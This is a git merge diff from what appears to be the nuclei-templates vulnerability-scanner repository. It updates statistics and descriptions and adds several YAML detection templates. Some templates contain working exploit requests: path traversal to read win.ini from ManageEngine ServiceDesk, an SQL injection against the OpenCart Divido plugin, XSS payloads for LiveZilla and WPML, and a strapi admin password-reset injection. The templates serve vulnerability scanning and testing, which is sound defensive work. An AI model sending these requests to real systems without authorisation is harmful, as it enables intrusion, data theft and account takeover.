Merge branch 'projectdiscovery:master' into master
commit
32f0310f59
|
@ -1,21 +1,5 @@
|
|||
cves/2021/CVE-2021-25111.yaml
|
||||
cves/2021/CVE-2021-25118.yaml
|
||||
cves/2021/CVE-2021-36356.yaml
|
||||
cves/2021/CVE-2021-39312.yaml
|
||||
cves/2022/CVE-2022-0165.yaml
|
||||
cves/2022/CVE-2022-0201.yaml
|
||||
cves/2022/CVE-2022-0288.yaml
|
||||
cves/2022/CVE-2022-0422.yaml
|
||||
cves/2022/CVE-2022-0543.yaml
|
||||
cves/2022/CVE-2022-0591.yaml
|
||||
cves/2022/CVE-2022-26352.yaml
|
||||
cves/2022/CVE-2022-26564.yaml
|
||||
exposed-panels/cyberoam-ssl-vpn-panel.yaml
|
||||
exposed-panels/oracle-containers-panel.yaml
|
||||
exposed-panels/oracle-enterprise-manager-login.yaml
|
||||
exposed-panels/supermicro-bmc-panel.yaml
|
||||
exposed-panels/xoops/xoops-installation-wizard.yaml
|
||||
exposed-panels/zoneminder-login.yaml
|
||||
exposures/files/desktop-ini-exposure.yaml
|
||||
technologies/sucuri-firewall.yaml
|
||||
vulnerabilities/wordpress/health-check-lfi.yaml
|
||||
cves/2022/CVE-2022-1040.yaml
|
||||
cves/2022/CVE-2022-29548.yaml
|
||||
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
|
||||
vulnerabilities/wordpress/wp-security-open-redirect.yaml
|
||||
vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 |
|
||||
| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 |
|
||||
| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 |
|
||||
| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 |
|
||||
| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | |
|
||||
| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | |
|
||||
| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | |
|
||||
| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | |
|
||||
| tech | 264 | gy741 | 116 | default-logins | 93 | | | | |
|
||||
| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | |
|
||||
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
|
||||
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
|
||||
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
|
||||
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
|
||||
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
|
||||
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
|
||||
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
|
||||
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
|
||||
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
|
||||
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
|
||||
|
||||
**254 directories, 3476 files**.
|
||||
**260 directories, 3520 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
3015
TEMPLATES-STATS.md
3015
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 |
|
||||
| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 |
|
||||
| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 |
|
||||
| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 |
|
||||
| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | |
|
||||
| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | |
|
||||
| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | |
|
||||
| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | |
|
||||
| tech | 264 | gy741 | 116 | default-logins | 93 | | | | |
|
||||
| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | |
|
||||
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
|
||||
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
|
||||
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
|
||||
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
|
||||
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
|
||||
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
|
||||
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
|
||||
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
|
||||
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
|
||||
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
|
||||
|
|
|
@ -26,4 +26,4 @@ network:
|
|||
words:
|
||||
- "SSH-1"
|
||||
|
||||
# Updated by Chris on 2022/01/21
|
||||
# Enhanced by Chris on 2022/01/21
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2005-2428
|
||||
|
||||
info:
|
||||
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
|
||||
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
|
||||
description: "Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696)."
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
|
@ -31,4 +32,4 @@ requests:
|
|||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/02/02
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -10,6 +10,9 @@ info:
|
|||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
classification:
|
||||
cve-id: CVE-2009-1872
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: cve,cve2009,adobe,xss,coldfusion
|
||||
|
||||
requests:
|
||||
|
|
|
@ -33,3 +33,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/09
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2017-11512
|
||||
|
||||
info:
|
||||
name: ManageEngine ServiceDesk - Unauthenticated Arbitrary File Download
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: |
|
||||
The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
|
||||
reference:
|
||||
- https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html
|
||||
- https://www.cvedetails.com/cve/CVE-2017-11512
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2017-11512
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"ManageEngine"
|
||||
tags: cve,cve2017,manageengine,lfr,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini'
|
||||
- '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2018-11231
|
||||
|
||||
info:
|
||||
name: Opencart Divido plugin - Sql Injection
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
reference:
|
||||
- http://foreversong.cn/archives/1183
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-11231
|
||||
tags: opencart,sqli,cve,cve2018
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.10
|
||||
cve-id: CVE-2018-11231
|
||||
cwe-id: CWE-89
|
||||
description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information."
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "6f7c6dcbc380aac3bcba1f9fccec991e"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -20,12 +20,18 @@ requests:
|
|||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php"
|
||||
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
|
||||
redirects: true
|
||||
|
||||
body: |
|
||||
icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
|
||||
- 'contains(tolower(all_headers), "text/html")'
|
||||
- 'contains(set_cookie, "_icl_current_admin_language")'
|
||||
- 'contains(body, "\"><script>alert(0);</script>")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/08
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2019-12962
|
||||
|
||||
info:
|
||||
name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
|
||||
author: Clment Cruchet
|
||||
severity: medium
|
||||
description: |
|
||||
LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49669
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2019-12962
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:LiveZilla
|
||||
tags: cve,cve2019,livezilla,xss
|
||||
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/mobile/index.php'
|
||||
|
||||
headers:
|
||||
Accept-Language: ';alert(document.domain)//'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "var detectedLanguage = ';alert(document.domain)//';"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -14,17 +14,21 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-14223
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2019,redirect
|
||||
tags: cve,cve2019,redirect,alfresco
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/share/page/dologin'
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
|
||||
|
||||
body: |
|
||||
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
part: header
|
||||
regex:
|
||||
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"
|
||||
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2019-15043
|
||||
|
||||
info:
|
||||
name: Grafana unauthenticated API
|
||||
author: bing0o
|
||||
severity: high
|
||||
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
|
||||
reference:
|
||||
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
|
||||
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
|
||||
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2019-15043
|
||||
cwe-id: CWE-306
|
||||
tags: cve,cve2019,grafana
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/snapshots HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Content-Length: 235
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: application/json
|
||||
|
||||
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
||||
|
||||
matchers:
|
||||
- part: body
|
||||
type: word
|
||||
words:
|
||||
- deleteKey
|
|
@ -1,11 +1,12 @@
|
|||
id: CVE-2019-1821
|
||||
|
||||
info:
|
||||
name: Cisco Prime Infrastructure Unauthorized RCE
|
||||
name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
|
||||
author: _0xf4n9x_
|
||||
severity: critical
|
||||
description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
|
||||
description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
|
||||
reference:
|
||||
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce
|
||||
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
|
||||
classification:
|
||||
|
@ -49,3 +50,5 @@ requests:
|
|||
- "status_code == 200"
|
||||
- "contains((body_2), '{{randstr}}')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2019-18394
|
||||
|
||||
info:
|
||||
name: Openfire Full Read SSRF
|
||||
name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.
|
||||
description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
|
||||
reference:
|
||||
- https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
- https://github.com/igniterealtime/Openfire/pull/1497
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-18394
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -25,3 +26,5 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-18818
|
||||
|
||||
info:
|
||||
name: strapi CMS Unauthenticated Admin Password Reset
|
||||
name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
|
||||
author: idealphase
|
||||
severity: critical
|
||||
description: strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
|
||||
description: "strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
|
||||
reference:
|
||||
- https://github.com/advisories/GHSA-6xc2-mj39-q599
|
||||
- https://www.exploit-db.com/exploits/50239
|
||||
|
@ -23,7 +23,9 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -49,4 +51,5 @@ requests:
|
|||
- .user.username
|
||||
- .user.email
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,12 +1,13 @@
|
|||
id: CVE-2019-19781
|
||||
|
||||
info:
|
||||
name: Citrix ADC Directory Traversal
|
||||
name: Citrix ADC and Gateway - Directory Traversal
|
||||
author: organiccrap,geeknik
|
||||
severity: critical
|
||||
description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
|
||||
description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
|
||||
reference:
|
||||
- https://support.citrix.com/article/CTX267027
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -28,3 +29,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "[global]"
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
id: CVE-2019-2578
|
||||
|
||||
info:
|
||||
name: Oracle WebCenter Sites Broken Access Control
|
||||
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control
|
||||
author: leovalcante
|
||||
severity: high
|
||||
description: Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical
|
||||
data or complete access to all Oracle WebCenter Sites accessible data.
|
||||
description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
|
||||
reference:
|
||||
- https://www.oracle.com/security-alerts/cpuapr2019.html
|
||||
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
|
||||
classification:
|
||||
|
@ -32,4 +32,5 @@ requests:
|
|||
regex:
|
||||
- '<script[\d\D]*<throwexception/>'
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
id: CVE-2019-2579
|
||||
|
||||
info:
|
||||
name: Oracle WebCenter Sites - SQL Injection
|
||||
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
|
||||
author: leovalcante
|
||||
severity: medium
|
||||
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker
|
||||
with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
|
||||
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
|
||||
reference:
|
||||
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||
- https://github.com/Leovalcante/wcs_scanner
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2579
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 4.3
|
||||
|
@ -49,3 +49,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,15 +1,16 @@
|
|||
id: CVE-2019-2725
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server - Unauthenticated RCE
|
||||
name: Oracle WebLogic Server - Remote Command Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
|
||||
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
|
||||
reference:
|
||||
- https://paper.seebug.org/910/
|
||||
- https://www.exploit-db.com/exploits/46780/
|
||||
- https://www.oracle.com/security-alerts/cpujan2020.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2725
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -43,3 +44,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,14 +1,13 @@
|
|||
id: CVE-2019-3396
|
||||
|
||||
info:
|
||||
name: Atlassian Confluence Path Traversal
|
||||
name: Atlassian Confluence Server - Path Traversal
|
||||
author: harshbothra_
|
||||
severity: critical
|
||||
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before
|
||||
6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server
|
||||
or Data Center instance via server-side template injection.
|
||||
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
|
||||
reference:
|
||||
- https://github.com/x-f1v3/CVE-2019-3396
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3396
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -36,3 +35,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "<param-name>contextConfigLocation</param-name>"
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,12 +1,10 @@
|
|||
id: CVE-2019-3929
|
||||
|
||||
info:
|
||||
name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
|
||||
name: Barco/AWIND OEM Presentation Platform - Remote Command Injection
|
||||
author: _0xf4n9x_
|
||||
severity: critical
|
||||
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware
|
||||
2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7
|
||||
are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
|
||||
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
|
||||
- https://www.exploit-db.com/exploits/46786/
|
||||
|
@ -33,3 +31,5 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,13 +1,13 @@
|
|||
id: CVE-2019-5127
|
||||
|
||||
info:
|
||||
name: YouPHPTube Encoder RCE
|
||||
name: YouPHPTube Encoder 2.3 - Remote Command Injection
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in
|
||||
YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
|
||||
description: "YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php."
|
||||
reference:
|
||||
- https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-5127
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -47,3 +47,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,13 +1,13 @@
|
|||
id: CVE-2019-6112
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
|
||||
name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
|
